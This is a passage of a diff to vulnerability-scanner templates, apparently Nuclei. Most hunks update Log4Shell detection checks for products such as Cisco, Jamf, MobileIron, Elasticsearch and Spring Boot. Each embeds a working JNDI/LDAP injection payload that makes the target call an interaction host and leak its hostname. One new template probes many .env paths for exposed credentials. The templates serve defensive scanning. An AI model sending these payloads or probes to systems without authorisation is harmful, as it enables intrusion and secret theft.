- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -55,10 +59,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/22

16
http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -29,7 +33,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/ccmadmin/showHome.do
appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin
matchers-condition: and
matchers:
@ -41,17 +45,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04

16
http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=admin&submit=Log+In
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -54,10 +58,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by CS 03/27/2023

20
http/vulnerabilities/code42/code42-log4j-rce.yaml
View File

@ -24,10 +24,14 @@ info:
metadata:
max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost'
- '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&url=https://localhost'
matchers-condition: and
matchers:
@ -39,13 +43,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/27

45
http/vulnerabilities/generic/generic-env.yaml Normal file
View File

@ -0,0 +1,45 @@
id: generic-env
info:
name: Generic Env File Disclosure
severity: high
author: kazet
description: |
A .env file was discovered containing sensitive information like database credentials and tokens. It should not be publicly accessible.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
tags: config,exposure,env
http:
- method: GET
path:
- "{{BaseURL}}/.env"
- "{{BaseURL}}/.env.bak"
- "{{BaseURL}}/.env.dev"
- "{{BaseURL}}/.env.dev.local"
- "{{BaseURL}}/.env.development.local"
- "{{BaseURL}}/.env.prod"
- "{{BaseURL}}/.env.prod.local"
- "{{BaseURL}}/.env.production"
- "{{BaseURL}}/.env.production.local"
- "{{BaseURL}}/.env.local"
- "{{BaseURL}}/.env.example"
- "{{BaseURL}}/.env.stage"
- "{{BaseURL}}/.env.live"
- "{{BaseURL}}/.env.backup"
- "{{BaseURL}}/.env.save"
- "{{BaseURL}}/.env.old"
- "{{BaseURL}}/.env.www"
- "{{BaseURL}}/.env_1"
- "{{BaseURL}}/.env_sample"
- "{{BaseURL}}/.env.{{DN}}"
- "{{BaseURL}}/.env.{{SD}}"
- "{{BaseURL}}/api/.env"
matchers:
- type: regex
part: body
regex:
- "(?mi)^[a-z_]*(KEY|TOKEN|PASS|SECRET|DB_URL|DATABASE_URL|MAILER_URL)[a-z_]*="

20
http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -31,7 +35,7 @@ http:
Referer: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}&password=
matchers-condition: and
matchers:
@ -48,13 +52,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23

20
http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
View File

@ -23,6 +23,10 @@ info:
verified: "true"
tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and
matchers:
@ -47,13 +51,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23

16
http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
View File

@ -21,10 +21,14 @@ info:
verified: "true"
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1
GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.search.{{interactsh-url}}%7D HTTP/1.1
Host: {{Hostname}}
{
@ -44,17 +48,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2022/10/04

16
http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -33,7 +37,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/goanywhere/auth/Login.xhtml
formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}}
cookie-reuse: true
matchers-condition: and
@ -46,7 +50,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: regex
@ -61,10 +65,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs 2022/10/10

16
http/vulnerabilities/other/graylog-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -32,7 +36,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
{"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"}
matchers-condition: and
matchers:
@ -44,7 +48,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: header
@ -56,10 +60,16 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by md on 2023/03/23

16
http/vulnerabilities/other/metabase-log4j.yaml
View File

@ -20,10 +20,14 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}"
- "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}"
matchers-condition: and
matchers:
@ -35,7 +39,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -47,8 +51,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true"
tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -29,7 +33,7 @@ http:
Referer: {{RootURL}}/opennms/login.jsp
Content-Type: application/x-www-form-urlencoded
j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=
matchers-condition: and
matchers:
@ -41,17 +45,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by cs on 2022/10/23

16
http/vulnerabilities/other/rundeck-log4j.yaml
View File

@ -20,6 +20,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -30,7 +34,7 @@ http:
Connection: close
Referer: {{BaseURL}}/user/login
j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin
matchers-condition: and
matchers:
@ -42,7 +46,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: location
@ -54,8 +58,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

20
http/vulnerabilities/other/unifi-network-log4j-rce.yaml
View File

@ -22,6 +22,10 @@ info:
verified: "true"
tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -31,7 +35,7 @@ http:
Origin: {{RootURL}}
Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
{"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
{"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
matchers-condition: and
matchers:
@ -43,13 +47,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/06/03

16
http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
View File

@ -21,10 +21,14 @@ info:
verified: "true"
tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- method: GET
path:
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D'
- '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
matchers-condition: and
matchers:
@ -36,7 +40,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -48,8 +52,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/other/xenmobile-server-log4j.yaml
View File

@ -11,6 +11,10 @@ info:
shodan-query: title:"XenMobile"
tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
@ -23,7 +27,7 @@ http:
Origin: {{BaseURL}}
Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin
login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
matchers-condition: and
matchers:
@ -35,7 +39,7 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
- type: word
part: body
@ -47,8 +51,14 @@ http:
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

16
http/vulnerabilities/springboot/springboot-log4j-rce.yaml
View File

@ -20,12 +20,16 @@ info:
metadata:
max-request: 1
variables:
rand1: '{{rand_int(111, 999)}}'
rand2: '{{rand_int(111, 999)}}'
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -37,17 +41,23 @@ http:
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
# Enhanced by mp on 2022/05/31

Some files were not shown because too many files have changed in this diff Show More